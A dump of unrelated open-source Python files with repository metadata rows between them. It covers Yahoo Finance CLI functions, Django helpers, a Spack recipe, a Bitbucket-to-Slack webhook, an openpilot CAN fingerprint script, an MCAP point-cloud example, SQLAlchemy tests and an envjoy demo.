print(e, "\n")
def shareholders(other_args: List[str], ticker: str):
"""Yahoo Finance ticker shareholders
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="shrs",
description="""Print Major, institutional and mutualfunds shareholders.
[Source: Yahoo Finance]""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
pd.set_option("display.max_colwidth", None)
# Major holders
print("Major holders")
df_major_holders = stock.major_holders
df_major_holders[1] = df_major_holders[1].apply(
lambda x: x.replace("%", "Percentage")
)
print(df_major_holders.to_string(index=False, header=False))
print("")
# Institutional holders
print("Institutional holders")
df_institutional_shareholders = stock.institutional_holders
df_institutional_shareholders.columns = (
df_institutional_shareholders.columns.str.replace("% Out", "Stake")
)
df_institutional_shareholders["Shares"] = df_institutional_shareholders[
"Shares"
].apply(lambda x: long_number_format(x))
df_institutional_shareholders["Value"] = df_institutional_shareholders[
"Value"
].apply(lambda x: long_number_format(x))
df_institutional_shareholders["Stake"] = df_institutional_shareholders[
"Stake"
].apply(lambda x: str(f"{100 * x:.2f}") + " %")
print(df_institutional_shareholders.to_string(index=False))
print("")
# Mutualfunds holders
print("Mutualfunds holders")
df_mutualfund_shareholders = stock.mutualfund_holders
df_mutualfund_shareholders.columns = (
df_mutualfund_shareholders.columns.str.replace("% Out", "Stake")
)
df_mutualfund_shareholders["Shares"] = df_mutualfund_shareholders[
"Shares"
].apply(lambda x: long_number_format(x))
df_mutualfund_shareholders["Value"] = df_mutualfund_shareholders["Value"].apply(
lambda x: long_number_format(x)
)
df_mutualfund_shareholders["Stake"] = df_mutualfund_shareholders["Stake"].apply(
lambda x: str(f"{100 * x:.2f}") + " %"
)
print(df_mutualfund_shareholders.to_string(index=False))
print("")
except Exception as e:
print(e, "\n")
def sustainability(other_args: List[str], ticker: str):
"""Yahoo Finance ticker sustainability
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="sust",
description="""
Print sustainability values of the company. The following fields are expected:
Palmoil, Controversialweapons, Gambling, Socialscore, Nuclear, Furleather, Alcoholic,
Gmo, Catholic, Socialpercentile, Peercount, Governancescore, Environmentpercentile,
Animaltesting, Tobacco, Totalesg, Highestcontroversy, Esgperformance, Coal, Pesticides,
Adult, Percentile, Peergroup, Smallarms, Environmentscore, Governancepercentile,
Militarycontract. [Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
pd.set_option("display.max_colwidth", None)
df_sustainability = stock.sustainability
if df_sustainability is None:
print(f"No sustainability information in Yahoo for {ticker}", "\n")
return
if df_sustainability.empty:
print(f"No sustainability information in Yahoo for {ticker}", "\n")
return
clean_df_index(df_sustainability)
df_sustainability = df_sustainability.rename(
index={
"Controversialweapons": "Controversial Weapons",
"Socialpercentile": "Social Percentile",
"Peercount": "Peer Count",
"Governancescore": "Governance Score",
"Environmentpercentile": "Environment Percentile",
"Animaltesting": "Animal Testing",
"Highestcontroversy": "Highest Controversy",
"Environmentscore": "Environment Score",
"Governancepercentile": "Governance Percentile",
"Militarycontract": "Military Contract",
}
)
print(df_sustainability.to_string(header=False))
print("")
except Exception as e:
print(e, "\n")
def calendar_earnings(other_args: List[str], ticker: str):
"""Yahoo Finance ticker calendar earnings
Parameters
----------
other_args : List[str]
argparse other args
ticker : str
Fundamental analysis ticker symbol
"""
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="cal",
description="""
Calendar earnings of the company. Including revenue and earnings estimates.
[Source: Yahoo Finance]
""",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
stock = yf.Ticker(ticker)
df_calendar = stock.calendar
if df_calendar.empty:
print(f"No earnings calendar information in Yahoo for {ticker}")
print("")
return
df_calendar.iloc[0, 0] = df_calendar.iloc[0, 0].date().strftime("%d/%m/%Y")
df_calendar.iloc[:, 0] = df_calendar.iloc[:, 0].apply(
lambda x: long_number_format(x)
)
print(f"Earnings Date: {df_calendar.iloc[:, 0]['Earnings Date']}")
avg = df_calendar.iloc[:, 0]["Earnings Average"]
low = df_calendar.iloc[:, 0]["Earnings Low"]
high = df_calendar.iloc[:, 0]["Earnings High"]
print(f"Earnings Estimate Avg: {avg} [{low}, {high}]")
print(
f"Revenue Estimate Avg: {df_calendar.iloc[:, 0]['Revenue Average']} \
[{df_calendar.iloc[:, 0]['Revenue Low']}, {df_calendar.iloc[:, 0]['Revenue High']}]"
)
print("")
except Exception as e:
print(e, "\n")
| 35.138667 | 100 | 0.61319 |
ca55552d1e3f21bc82a50b25febed67e25d84010 | 3,338 | py | Python | pdc/apps/common/hacks.py | bliuredhat/PDC | 48c7761d360225d6f4073adc2e7938348844e909 | [
"MIT"
] | 1 | 2018-05-02T08:39:37.000Z | 2018-05-02T08:39:37.000Z | pdc/apps/common/hacks.py | bliuredhat/PDC | 48c7761d360225d6f4073adc2e7938348844e909 | [
"MIT"
] | null | null | null | pdc/apps/common/hacks.py | bliuredhat/PDC | 48c7761d360225d6f4073adc2e7938348844e909 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
import re
from django.db import connection
from django.conf import settings
from django.core.exceptions import ValidationError
from rest_framework import serializers
from pkg_resources import parse_version
def deserialize_wrapper(func, data):
"""
Convert generic productmd exceptions into validation errors.
"""
try:
func(data)
except KeyError as e:
raise serializers.ValidationError(
{'detail': 'Error parsing productmd metadata.',
'reason': 'Missing key %s' % e.message}
)
except Exception as e:
raise serializers.ValidationError(
{'detail': 'Error parsing productmd metadata.',
'reason': str(e)}
)
def add_returning(sql):
"""
Add SQL clause required to return id of inserted item if the backend needs
it. The suffix is created only once and then cached.
"""
if not hasattr(add_returning, '_returning'):
add_returning._returning = ""
r_fmt = connection.ops.return_insert_id()
if r_fmt:
add_returning._returning = " " + r_fmt[0] % "id"
return sql + add_returning._returning
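# Illustrative effect (backend-dependent, hypothetical statement): on a
# backend whose `return_insert_id()` yields "RETURNING %s INTO %%s", the call
#   add_returning("INSERT INTO t (x) VALUES (1)")
# would append " RETURNING id INTO %s"; backends without such support leave
# the statement unchanged.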
def bool_from_native(value):
"""Convert value to bool."""
if value in ('false', 'f', 'False', '0'):
return False
return bool(value)
def convert_str_to_bool(value, name=None):
"""
Try to strictly convert a string value to boolean or raise ValidationError.
"""
if value in (True, 'true', 't', 'True', '1'):
return True
if value in (False, 'false', 'f', 'False', '0'):
return False
ident = ' of %s' % name if name else ''
raise serializers.ValidationError('Value [%s]%s is not a boolean' % (value, ident))
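# Illustrative behaviour of the strict conversion above (values chosen for
# the example):
#   convert_str_to_bool('t') -> True
#   convert_str_to_bool('False') -> False
#   convert_str_to_bool('yes') -> raises serializers.ValidationError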
def as_instance(arg, type, name=None):
"""Return arg if it is an instance of type, otherwise raise ValidationError."""
if not isinstance(arg, type):
ident = '%s: ' % name if name else ''
raise ValidationError('%s"%s" is not a %s' % (ident, arg, type.__name__))
return arg
def as_list(arg, name=None):
return as_instance(arg, list, name)
def as_dict(arg, name=None):
return as_instance(arg, dict, name)
def convert_str_to_int(value, name=None):
"""
Convert a string value to int or raise ValidationError.
"""
try:
value = int(value)
    except (TypeError, ValueError):
ident = ' of %s' % name if name else ''
raise ValidationError('Value [%s]%s is not an integer' % (value, ident))
else:
return value
def validate_model(sender, **kwargs):
if "raw" in kwargs and not kwargs["raw"]:
kwargs["instance"].full_clean()
def srpm_name_to_component_names(srpm_name):
if settings.WITH_BINDINGS:
from pdc.apps.bindings import models as binding_models
return binding_models.ReleaseComponentSRPMNameMapping.get_component_names_by_srpm_name(srpm_name)
else:
return [srpm_name]
def parse_epoch_version(version):
"""
Wrapper around `pkg_resources.parse_version` that can handle epochs
delimited by colon as is customary for RPMs.
"""
if re.match(r'^\d+:', version):
version = re.sub(r'^(\d+):', r'\1!', version)
return parse_version(version)
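# Example (illustrative): the RPM-style epoch dominates the comparison,
# e.g. parse_epoch_version('1:2.0') > parse_epoch_version('3.0') holds,
# because '1:2.0' is first normalized to the PEP 440 form '1!2.0'.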
| 28.529915 | 105 | 0.645596 |
0edf8b5e9890c9048cbe436c9067d6876be2c29b | 389 | py | Python | travel/travel/wsgi.py | Neeraj2701/numpy | bbc3167427eb8ecafeee3c5c9606b3532405dd96 | [
"BSD-3-Clause"
] | null | null | null | travel/travel/wsgi.py | Neeraj2701/numpy | bbc3167427eb8ecafeee3c5c9606b3532405dd96 | [
"BSD-3-Clause"
] | null | null | null | travel/travel/wsgi.py | Neeraj2701/numpy | bbc3167427eb8ecafeee3c5c9606b3532405dd96 | [
"BSD-3-Clause"
] | null | null | null | """
WSGI config for travel project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'travel.settings')
application = get_wsgi_application()
| 22.882353 | 78 | 0.784062 |
51898f56b60cd495c477ad270447f3714aa032c3 | 1,734 | py | Python | table.py | ZePedroResende/CC | 8644a518aeda3dc48f3e1c9700eff8b50b49b214 | [
"MIT"
] | 1 | 2021-04-06T13:44:41.000Z | 2021-04-06T13:44:41.000Z | table.py | ZePedroResende/CC | 8644a518aeda3dc48f3e1c9700eff8b50b49b214 | [
"MIT"
] | null | null | null | table.py | ZePedroResende/CC | 8644a518aeda3dc48f3e1c9700eff8b50b49b214 | [
"MIT"
] | null | null | null | import threading
class table:
def __init__(self):
self.server_list = {}
self.lock = threading.RLock()
def add_server(self, info):
with self.lock:
self.server_list[info['ip']] = info
def remove_server(self, server):
with self.lock:
del self.server_list[server['ip']]
def build_server(self, ip, porta, ram, cpu, rtt,
bandwidth, auth):
n_times = 0
with self.lock:
if ip in self.server_list:
n_times += self.server_list[ip]['n_times']
return {'ip': ip, 'porta': porta, 'ram': float(ram),
'cpu': float(cpu), 'rtt': float(rtt),
'bandwidth': float(bandwidth),
'n_times': n_times}
    def print(self):
        print("\n")
        m = 5  # minimum width so the header renders even for an empty table
        with self.lock:
            lista = list(self.server_list.values())
        for v in lista:
            m = max(m, len(str(v)))
        padding = (m-5) // 2
        print("-"*padding + "TABLE" + "-" * padding)
for each in lista:
print(each)
print("-"*m)
print(self.best_server())
def best_server(self):
def media(d):
d = d[1]
media = (d['ram'] + d['cpu'] + d['bandwidth'])/3
load = media <= 70
time = d['rtt'] < 60
return load and time
with self.lock:
lista = sorted(self.server_list.items(),
key=lambda x: x[1]['n_times'])
filt = list(filter(lambda x: media(x), lista))
if not filt:
res = lista[0][1]
else:
res = filt[0][1]
self.server_list[res['ip']]['n_times'] += 1
return res
| 28.9 | 60 | 0.471165 |
62551cfc9cad599093e7245a3ce733e9df1a0edb | 855 | py | Python | var/spack/repos/builtin/packages/py-pythonqwt/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2018-11-27T03:39:44.000Z | 2021-09-06T15:50:35.000Z | var/spack/repos/builtin/packages/py-pythonqwt/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-01-11T20:11:52.000Z | 2019-01-11T20:11:52.000Z | var/spack/repos/builtin/packages/py-pythonqwt/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-10-14T14:20:17.000Z | 2020-10-14T14:20:17.000Z | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPythonqwt(PythonPackage):
"""Qt plotting widgets for Python"""
homepage = "https://github.com/PierreRaybaut/PythonQwt"
url = "https://pypi.io/packages/source/P/PythonQwt/PythonQwt-0.5.5.zip"
version('0.5.5', 'a60c7da9fbca667337d14aca094b6fda')
variant('doc', default=False, description="Build documentation.")
depends_on('py-setuptools', type='build')
depends_on('py-numpy@1.3:', type=('build', 'run'))
depends_on('py-sip', type=('build', 'run'))
depends_on('py-pyqt@4:', type=('build', 'run'))
depends_on('py-sphinx@1.1:', type=('build', 'run'), when='+docs')
| 35.625 | 80 | 0.669006 |
a71feaac7ac5930f5cb3661ef5607610d8f5c9d0 | 4,031 | py | Python | main.py | nshttpd/gcf-bb-slack | 5e5a63076ef2b33cd19f450eb99d710f30f1d498 | [
"BSD-3-Clause"
] | null | null | null | main.py | nshttpd/gcf-bb-slack | 5e5a63076ef2b33cd19f450eb99d710f30f1d498 | [
"BSD-3-Clause"
] | 1 | 2018-11-28T16:40:29.000Z | 2018-11-28T16:40:29.000Z | main.py | nshttpd/gcf-bb-slack | 5e5a63076ef2b33cd19f450eb99d710f30f1d498 | [
"BSD-3-Clause"
] | null | null | null | #
# simple GCF to handle a BB Webhook to Slack Webhook. i.e. a Thunk layer.
#
from flask import abort
import hashlib
import hmac
import os
import json
import logging
from urllib import request
#
# Validate the request based on a shared secret signature based on the body
#
# https://confluence.atlassian.com/bitbucketserver/managing-webhooks-in-bitbucket-server-938025878.html#ManagingwebhooksinBitbucketServer-Securingyourwebhook
#
def validate_request(body, signature):
sekret = os.environ.get('BITBUCKET_SECRET', None)
if sekret is not None:
s = bytes(sekret, 'utf-8')
h = hmac.new(s, body, digestmod=hashlib.sha256).hexdigest()
calc_sig = "sha256=%s" % h
if calc_sig == signature:
return True
logging.info('got invalid signature')
return False
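# Illustrative self-check (made-up secret and body, not part of the handler):
#   body = b'{"test": true}'
#   sig = 'sha256=' + hmac.new(b'sekret', body, hashlib.sha256).hexdigest()
#   validate_request(body, sig)  # -> True when BITBUCKET_SECRET == 'sekret'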
def send_slack_msg(msg):
webhook = os.environ.get('SLACK_WEBHOOK', None)
if webhook is not None:
headers = {'Content-type': 'application/json'}
data = {'attachments': [msg], 'icon_emoji': ':bitbucket:'}
payload = bytes(json.dumps(data), 'utf-8')
req = request.Request(webhook, data=payload, headers=headers)
resp = request.urlopen(req)
return
def get_attachment_base(event):
events = {
'pr:opened': {'pretext': 'Pull Request Created', 'color': 'good'},
'pr:modified': {'pretext': 'Pull Request Modified', 'color': 'warning'},
'pr:reviewer:approved': {'pretext': 'Pull Request Approved', 'color': 'good'},
'pr:reviewer:unapproved': {'pretext': 'Pull Request Unapproved', 'color': 'danger'},
'pr:reviewer:needs_work': {'pretext': 'Pull Request Needs Work', 'color': 'warning'},
'pr:merged': {'pretext': 'Pull Request Merged', 'color': '#000000'},
'pr:declined': {'pretext': 'Pull Request Declined', 'color': 'danger'},
'pr:comment:added': {'pretext': 'Pull Request Comment Added', 'color': 'good'},
'pr:comment:edited': {'pretext': 'Pull Request Comment Edited', 'color': 'warning'},
'pr:comment:deleted': {'pretext': 'Pull Request Comment Deleted', 'color': 'danger'}
}
return events.get(event, None)
def slack_template(event_key, d, attachment):
bb_host = os.environ.get('BITBUCKET_HOST', None)
link = 'https://%s/projects/%s/repos/%s/pull-requests/%s/' % (bb_host,
d['pullRequest']['fromRef']['repository']['project']['key'],
d['pullRequest']['fromRef']['repository']['slug'],
d['pullRequest']['id'])
if event_key.startswith('pr:comment'):
attachment['text'] = '<%s|#%s> : %s' % (link, d['pullRequest']['id'], d['comment']['text'])
else:
attachment['text'] = '<%s|#%s> : %s' % (link, d['pullRequest']['id'], d['pullRequest']['title'])
attachment['fields'] = [
{
'title': 'Author',
'value': d['actor']['displayName'],
'short': True
},
{
'title': 'Repo : Branch',
'value': '%s : %s' % (d['pullRequest']['fromRef']['repository']['slug'], d['pullRequest']['fromRef']['displayId']),
'short': True
}
]
return attachment
def bb_webhook(req):
event_key = req.headers['x-event-key']
# ping to validate webhook.
if event_key == 'diagnostics:ping':
return 'PONG'
raw_req = req.get_data()
if validate_request(raw_req, req.headers['X-Hub-Signature']):
if req.method == 'POST':
if req.headers['content-type'] == 'application/json; charset=utf-8':
req_json = json.loads(raw_req)
attachment = get_attachment_base(event_key)
if attachment is not None:
attachment = slack_template(event_key, req_json, attachment)
send_slack_msg(attachment)
return 'OK'
return abort(404)
| 37.672897 | 157 | 0.577276 |
9ece7d7268cb3240737567b192484f343226bfc5 | 999 | py | Python | selfdrive/debug/get_fingerprint.py | 919bot/Tessa | 9b48ff9020e8fb6992fc78271f2720fd19e01093 | [
"MIT"
] | 85 | 2019-06-14T17:51:31.000Z | 2022-02-09T22:18:20.000Z | selfdrive/debug/get_fingerprint.py | 919bot/Tessa | 9b48ff9020e8fb6992fc78271f2720fd19e01093 | [
"MIT"
] | 4 | 2020-04-12T21:34:03.000Z | 2020-04-15T22:22:15.000Z | selfdrive/debug/get_fingerprint.py | 919bot/Tessa | 9b48ff9020e8fb6992fc78271f2720fd19e01093 | [
"MIT"
] | 73 | 2018-12-03T19:34:42.000Z | 2020-07-27T05:10:23.000Z | #!/usr/bin/env python3
# simple script to get a vehicle fingerprint.
# Instructions:
# - connect to a Panda
# - run selfdrive/boardd/boardd
# - launching this script
# - turn on the car in STOCK MODE (set giraffe switches properly).
# Note: it's very important that the car is in stock mode, in order to collect a complete fingerprint
# - since some messages are published at low frequency, keep this script running for at least 30s,
# until all messages are received at least once
import cereal.messaging as messaging
logcan = messaging.sub_sock('can')
msgs = {}
while True:
lc = messaging.recv_sock(logcan, True)
for c in lc.can:
# read also msgs sent by EON on CAN bus 0x80 and filter out the
# addr with more than 11 bits
if c.src in [0, 2] and c.address < 0x800:
msgs[c.address] = len(c.dat)
fingerprint = ', '.join("%d: %d" % v for v in sorted(msgs.items()))
print("number of messages {0}:".format(len(msgs)))
print("fingerprint {0}".format(fingerprint))
| 33.3 | 103 | 0.700701 |
c57cdbb31754286f6171b33571f0a576ef502002 | 98 | py | Python | backend/init_db.py | daniilmotsniy/FinancialAssistantBot | 2ca965a0ccfb8da72500c3da8da34ed48405cbaa | [
"MIT"
] | 1 | 2022-01-28T14:58:24.000Z | 2022-01-28T14:58:24.000Z | backend/init_db.py | daniilmotsniy/FinancialAssistantBot | 2ca965a0ccfb8da72500c3da8da34ed48405cbaa | [
"MIT"
] | 9 | 2021-08-07T11:25:18.000Z | 2021-11-14T15:49:51.000Z | backend/init_db.py | daniilmotsniy/FinancialAssistantBot | 2ca965a0ccfb8da72500c3da8da34ed48405cbaa | [
"MIT"
] | null | null | null | from models.user import User, db
from models.assets import Asset, AssetTypes, db
db.create_all()
| 19.6 | 47 | 0.785714 |
b389e58be274f06c0803095e0dbc385d5cd39079 | 2,052 | py | Python | src/openbiolink/graph_creation/metadata_edge/edge/edgeMetaGeneBindInhGene.py | jerryhluo/OpenBioLink | 6fc073af978daec0b0db5938b73beed37f57f495 | [
"MIT"
] | 97 | 2019-11-26T09:53:18.000Z | 2022-03-19T10:33:10.000Z | src/openbiolink/graph_creation/metadata_edge/edge/edgeMetaGeneBindInhGene.py | jerryhluo/OpenBioLink | 6fc073af978daec0b0db5938b73beed37f57f495 | [
"MIT"
] | 67 | 2019-12-09T21:01:52.000Z | 2021-12-21T15:19:41.000Z | src/openbiolink/graph_creation/metadata_edge/edge/edgeMetaGeneBindInhGene.py | jerryhluo/OpenBioLink | 6fc073af978daec0b0db5938b73beed37f57f495 | [
"MIT"
] | 20 | 2020-01-13T23:02:25.000Z | 2022-03-16T21:43:31.000Z | import os
from openbiolink.graph_creation import graphCreationConfig as glob
from openbiolink.graph_creation.metadata_edge.edgeRegularMetadata import EdgeRegularMetadata
from openbiolink.graph_creation.metadata_infile import InMetaEdgeStringBindInh
from openbiolink.graph_creation.metadata_infile.mapping.inMetaMapString import InMetaMapString
from openbiolink.graph_creation.types.qualityType import QualityType
class EdgeMetaGeneBindInhGene(EdgeRegularMetadata):
NAME = "Edge - Gene_binding/inhibition_Gene"
LQ_CUTOFF = 0
MQ_CUTOFF = 400
HQ_CUTOFF = 700
EDGE_INMETA_CLASS = InMetaEdgeStringBindInh
MAP1_META_CLASS = InMetaMapString
def __init__(self, quality: QualityType = None):
edges_file_path = os.path.join(glob.IN_FILE_PATH, self.EDGE_INMETA_CLASS.CSV_NAME)
mapping_file1 = os.path.join(glob.IN_FILE_PATH, self.MAP1_META_CLASS.CSV_NAME)
super().__init__(
is_directional=True,
edges_file_path=edges_file_path,
source=self.EDGE_INMETA_CLASS.SOURCE,
colindex1=self.EDGE_INMETA_CLASS.NODE1_COL,
colindex2=self.EDGE_INMETA_CLASS.NODE2_COL,
edgeType=self.EDGE_INMETA_CLASS.EDGE_TYPE,
node1_type=self.EDGE_INMETA_CLASS.NODE1_TYPE,
node1_namespace=self.EDGE_INMETA_CLASS.NODE1_NAMESPACE,
node2_type=self.EDGE_INMETA_CLASS.NODE2_TYPE,
node2_namespace=self.EDGE_INMETA_CLASS.NODE2_NAMESPACE,
colindex_qscore=self.EDGE_INMETA_CLASS.QSCORE_COL,
quality=quality,
mapping1_file=mapping_file1,
mapping1_targetnamespace=self.MAP1_META_CLASS.TARGET_NAMESPACE,
map1_sourceindex=self.MAP1_META_CLASS.SOURCE_COL,
map1_targetindex=self.MAP1_META_CLASS.TARGET_COL,
mapping2_file=mapping_file1,
mapping2_targetnamespace=self.MAP1_META_CLASS.TARGET_NAMESPACE,
map2_sourceindex=self.MAP1_META_CLASS.SOURCE_COL,
map2_targetindex=self.MAP1_META_CLASS.TARGET_COL,
)
| 45.6 | 94 | 0.75 |
049ebc0cc34c6f91fe4c60a882ee37e0bc753ca2 | 1,824 | py | Python | examples/point_cloud_example.py | foxglove/python-mcap-protobuf-support | ae325c9cbe49710fe397dff74939b5907b52aae9 | [
"Apache-2.0"
] | 1 | 2022-03-10T17:18:05.000Z | 2022-03-10T17:18:05.000Z | examples/point_cloud_example.py | foxglove/python-mcap-protobuf-support | ae325c9cbe49710fe397dff74939b5907b52aae9 | [
"Apache-2.0"
] | null | null | null | examples/point_cloud_example.py | foxglove/python-mcap-protobuf-support | ae325c9cbe49710fe397dff74939b5907b52aae9 | [
"Apache-2.0"
] | null | null | null | # This example writes a single point cloud message.
import os
import struct
import sys
from io import BytesIO
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import time
from random import random
from mcap.mcap0.writer import Writer as McapWriter
from mcap_protobuf.schema import register_schema
from ros.builtins_pb2 import Time
from ros.sensor_msgs.PointCloud2_pb2 import PointCloud2
from ros.sensor_msgs.PointField_pb2 import PointField
from ros.std_msgs.Header_pb2 import Header
output = open("point_cloud.mcap", "w+b")
mcap_writer = McapWriter(output)
mcap_writer.start(profile="protobuf", library="test")
cloud_schema_id = register_schema(writer=mcap_writer, message_class=PointCloud2)
cloud_channel_id = mcap_writer.register_channel(
topic="/point_cloud",
message_encoding="protobuf",
schema_id=cloud_schema_id,
)
header = Header(seq=0, stamp=Time(sec=int(time.time()), nsec=0), frame_id="example")
fields = [
PointField(name="x", offset=0, datatype=7, count=1),
PointField(name="y", offset=4, datatype=7, count=1),
PointField(name="z", offset=8, datatype=7, count=1),
PointField(name="intensity", offset=12, datatype=7, count=1),
]
num_points = 100
data = BytesIO()
scale = 2
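# Each point below is packed as four little-endian float32s
# (x, y, z, intensity), i.e. 16 bytes per point, which is exactly what
# point_step=16 in the PointCloud2 message describes.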
for i in range(num_points):
data.write(
struct.pack(
"<ffff", scale * random(), scale * random(), scale * random(), random()
)
)
message = PointCloud2(
header=header,
width=num_points,
height=1,
point_step=16,
row_step=100 * 16,
fields=fields,
data=data.getvalue(),
is_bigendian=False,
is_dense=True,
)
mcap_writer.add_message(
    channel_id=cloud_channel_id,
log_time=time.time_ns(),
data=message.SerializeToString(), # type: ignore
publish_time=time.time_ns(),
)
mcap_writer.finish()
output.close()
| 26.057143 | 84 | 0.720395 |
c752feba56cb8418ab3f98a29841b195abb82735 | 2,151 | py | Python | tests/aggregate/test_backrefs.py | jd/sqlalchemy-utils | fa78e45f9bd38b46d5aface41914dad022c0099b | [
"BSD-3-Clause"
] | null | null | null | tests/aggregate/test_backrefs.py | jd/sqlalchemy-utils | fa78e45f9bd38b46d5aface41914dad022c0099b | [
"BSD-3-Clause"
] | null | null | null | tests/aggregate/test_backrefs.py | jd/sqlalchemy-utils | fa78e45f9bd38b46d5aface41914dad022c0099b | [
"BSD-3-Clause"
] | null | null | null | import sqlalchemy as sa
from sqlalchemy_utils.aggregates import aggregated
from tests import TestCase
class TestAggregateValueGenerationForSimpleModelPaths(TestCase):
def create_models(self):
class Thread(self.Base):
__tablename__ = 'thread'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
@aggregated('comments', sa.Column(sa.Integer, default=0))
def comment_count(self):
return sa.func.count('1')
class Comment(self.Base):
__tablename__ = 'comment'
id = sa.Column(sa.Integer, primary_key=True)
content = sa.Column(sa.Unicode(255))
thread_id = sa.Column(sa.Integer, sa.ForeignKey('thread.id'))
thread = sa.orm.relationship(Thread, backref='comments')
self.Thread = Thread
self.Comment = Comment
def test_assigns_aggregates_on_insert(self):
thread = self.Thread()
thread.name = u'some article name'
self.session.add(thread)
comment = self.Comment(content=u'Some content', thread=thread)
self.session.add(comment)
self.session.commit()
self.session.refresh(thread)
assert thread.comment_count == 1
def test_assigns_aggregates_on_separate_insert(self):
thread = self.Thread()
thread.name = u'some article name'
self.session.add(thread)
self.session.commit()
comment = self.Comment(content=u'Some content', thread=thread)
self.session.add(comment)
self.session.commit()
self.session.refresh(thread)
assert thread.comment_count == 1
def test_assigns_aggregates_on_delete(self):
thread = self.Thread()
thread.name = u'some article name'
self.session.add(thread)
self.session.commit()
comment = self.Comment(content=u'Some content', thread=thread)
self.session.add(comment)
self.session.commit()
self.session.delete(comment)
self.session.commit()
self.session.refresh(thread)
assert thread.comment_count == 0
| 35.262295 | 73 | 0.637843 |
6ee9b1d0191d5ed3ed652b459fb925265b51a272 | 6,879 | py | Python | examples/basic.py | grimen/python-envjoy | e4abcc7251a400850c67419a96d29fe97f000fef | [
"MIT"
] | null | null | null | examples/basic.py | grimen/python-envjoy | e4abcc7251a400850c67419a96d29fe97f000fef | [
"MIT"
] | null | null | null | examples/basic.py | grimen/python-envjoy | e4abcc7251a400850c67419a96d29fe97f000fef | [
"MIT"
] | null | null | null |
# =========================================
# IMPORTS
# --------------------------------------
from __future__ import print_function # Optional: Python 2 support for `env.print`
import rootpath
rootpath.append()
# =========================================
# EXAMPLE
# --------------------------------------
from envjoy import env
# non-casted access - never throws annoying errors
print(env.FOO)
env.FOO = 1
print(env.FOO)
del env.FOO
print(env.FOO)
# casted access - never throws annoying errors
del env['FOO']
print('---')
print(env['FOO']) # => None
env['FOO'] = 1 # set value without complaints (casted to string)
print(env['FOO']) # => "1"
print(env['FOO', int]) # => 1
print('---')
env['FOO'] = None
print(env['FOO']) # => ''
print(env['FOO', bool]) # => False
print(env['FOO', int]) # => 0
print(env['FOO', float]) # => 0.0
print(env['FOO', str]) # => ''
print(env['FOO', tuple]) # => ()
print(env['FOO', list]) # => []
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = True
print(env['FOO']) # => 'True'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 1
print(env['FOO', float]) # => 1.0
print(env['FOO', str]) # => 'true'
print(env['FOO', tuple]) # => (True)
print(env['FOO', list]) # => [True]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 'true' # => 'true'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 1
print(env['FOO', float]) # => 1.0
print(env['FOO', str]) # => 'true'
print(env['FOO', tuple]) # => (True)
print(env['FOO', list]) # => [True]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 0
print(env['FOO']) # => '0'
print(env['FOO', bool]) # => False
print(env['FOO', int]) # => 0
print(env['FOO', float]) # => 0.0
print(env['FOO', str]) # => '0'
print(env['FOO', tuple]) # => (0)
print(env['FOO', list]) # => [0]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '0'
print(env['FOO']) # => '0'
print(env['FOO', bool]) # => False
print(env['FOO', int]) # => 0
print(env['FOO', float]) # => 0.0
print(env['FOO', str]) # => '0'
print(env['FOO', tuple]) # => (0)
print(env['FOO', list]) # => [0]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = 1
print(env['FOO']) # => '1'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 1
print(env['FOO', float]) # => 1.0
print(env['FOO', str]) # => '1'
print(env['FOO', tuple]) # => (1)
print(env['FOO', list]) # => [1]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '1'
print(env['FOO']) # => '1'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => 1
print(env['FOO', float]) # => 1.0
print(env['FOO', str]) # => '1'
print(env['FOO', tuple]) # => (1)
print(env['FOO', list]) # => [1]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = -1
print(env['FOO']) # => '-1'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => -1
print(env['FOO', float]) # => -1.0
print(env['FOO', str]) # => '-1'
print(env['FOO', tuple]) # => (-1)
print(env['FOO', list]) # => [-1]
print(env['FOO', dict]) # => {}
print('---')
env['FOO'] = '-1'
print(env['FOO']) # => '-1'
print(env['FOO', bool]) # => True
print(env['FOO', int]) # => -1
print(env['FOO', float]) # => -1.0
print(env['FOO', str]) # => '-1'
